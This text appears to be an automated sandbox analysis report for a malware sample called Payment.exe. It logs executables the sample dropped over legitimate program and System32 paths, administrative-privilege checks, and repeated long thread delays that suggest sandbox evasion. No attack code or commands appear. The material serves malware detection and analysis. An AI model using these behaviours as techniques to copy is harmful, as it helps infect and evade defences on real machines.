                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Windows\System32\SgrmBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_19-5704
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_21-5705
                  Source: C:\Users\user\Desktop\Payment.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_8-117701
                  Source: C:\Windows\System32\Spectrum.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_27-5647
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_28-5727
                  Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-5640
                  Source: C:\Windows\SysWOW64\perfhost.exeAPI coverage: 5.2 %
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeAPI coverage: 9.9 %
                  Source: C:\Users\user\Desktop\Payment.exe TID: 4456Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432Thread sleep count: 5125 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep count: 212 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7884Thread sleep count: 4991 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599550s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599293s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599185s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7884Thread sleep count: 4034 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -599076s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598968s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598858s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598421s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598311s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597971s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597849s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597280s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597171s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -597058s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596951s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596842s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596372s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596252s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596128s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -595867s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -595701s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -595588s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -595463s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -595308s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594986s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594691s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -594109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593997s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593886s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593655s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593538s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593419s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593178s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -593047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -592923s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exe TID: 7852Thread sleep time: -592797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\msdtc.exe TID: 7728Thread sleep count: 483 > 30
                  Source: C:\Windows\System32\msdtc.exe TID: 7728Thread sleep time: -48300s >= -30000s
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876Thread sleep count: 7281 > 30
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876Thread sleep time: -72810000s >= -30000s
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876Thread sleep count: 2716 > 30
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876Thread sleep time: -27160000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 7904Thread sleep time: -850000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -35971150943733603s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599843s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599734s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599516s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599404s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599296s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599188s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -599076s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598968s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598858s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598649s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598438s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598320s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598188s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -598078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597963s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597860s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597532s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597422s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597313s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597178s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -597047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -596938s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -596601s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -596485s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -596373s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -596265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -596122s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595986s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595766s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595542s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595438s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595110s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -595000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -594694s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -594448s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -594342s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -594234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -594101s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -594000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -593891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -593773s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640Thread sleep time: -593672s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7696Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4DF57 FindFirstFileW,8_2_02E4DF57
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599812Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599550Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599293Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599185Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599076Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598968Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598858Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598640Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598421Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598311Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597971Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597849Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597609Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597280Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597058Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596951Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596372Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596252Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596128Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595867Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595701Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595588Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595463Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595308Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594986Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594691Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594109Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593997Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593886Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593765Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593655Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593538Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593419Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593297Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593178Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593047Jump to behavior
